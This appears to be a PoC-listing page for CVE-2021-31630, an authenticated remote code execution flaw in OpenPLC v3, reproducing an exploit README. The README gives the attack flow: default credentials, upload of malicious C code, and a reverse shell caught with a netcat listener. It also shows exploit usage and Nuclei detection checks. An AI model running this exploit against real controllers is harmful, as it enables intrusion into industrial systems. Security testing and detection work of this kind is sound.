Related vulnerability
Title:
OpenPLC code injection vulnerability
(CVE-2021-31630)
Description: OpenPLC is an open-source programmable logic controller that provides a low-cost industrial solution for automation and research. OpenPLC v3 contains a code injection vulnerability caused by the Hardware Layer Code Box component of the /hardware page in the product's web service failing to filter special characters in user input. An attacker can exploit this vulnerability to execute system commands.
Introduction
# OpenPLC v3 Authenticated RCE (CVE-2021-31630)
This is a modern Python 3.13+ compatible proof-of-concept exploit for CVE-2021-31630, a vulnerability in OpenPLC v3 that allows an authenticated user to upload a custom hardware layer containing malicious code, leading to remote code execution (RCE) on the host.
Original vulnerability discovery and advisory by Fellipe Oliveira.
This reimplementation and modernization uses httpx, CLI tooling, logging, and safer detection techniques.
## Exploit Overview
- Vulnerability: CVE-2021-31630
- Component: OpenPLC v3 Web Server
- Impact: Authenticated Remote Code Execution
- Default Credentials: openplc:openplc
## Exploit Flow
1. Login using valid credentials
2. Upload malicious C code as a custom hardware layer
3. Trigger compilation
4. Trigger execution (optional)
5. Receive reverse shell connection
## Usage
1. Start a listener:
```
nc -lvnp 9001
```
2. Run the exploit:
```
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001
```
Optional flags:
- -u Username (default: openplc)
- -p Password (default: openplc)
- -t Timeout in seconds (default: 20)
### Features
- [x] Compatible with Python 3.13+
- [x] Built with httpx
- [x] Logging support for clean output
- [x] Modular functions for easier reuse
- [x] Nuclei detection templates included
## Nuclei Detection Templates
1. Default Credentials Check
```
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
```
2. Passive RCE Vulnerability Check
```
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080
```
The second template logs in and attempts a harmless payload upload plus compilation to confirm that the target is likely vulnerable, without triggering actual code execution.
## Included Files
- OpenPLC_CVE_2021_31630.py – Python 3.13+ exploit
- nuclei-templates/openplc-default-login.yaml – Detect default creds
- nuclei-templates/openplc-authenticated-rce-check.yaml – Detect vulnerable behavior safely
## ⚠️ Legal / Ethics
This code is for educational and authorized security testing only.
Do not use without explicit permission from the system owner.
File snapshot
[4.0K] /data/pocs/677e5361e6f961d6155bec4d406f753650cfe65b
├── [4.0K] nuclei-templates
│ ├── [1.2K] openplc-authenticated-rce-check.yaml
│ └── [ 802] openplc-default-login.yaml
├── [5.3K] OpenPLC_CVE_2021_31630.py
└── [2.1K] README.md
1 directory, 4 files
Notes
1. It is recommended to access the PoC through the original source first.
2. If the source has gone offline or cannot be accessed, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.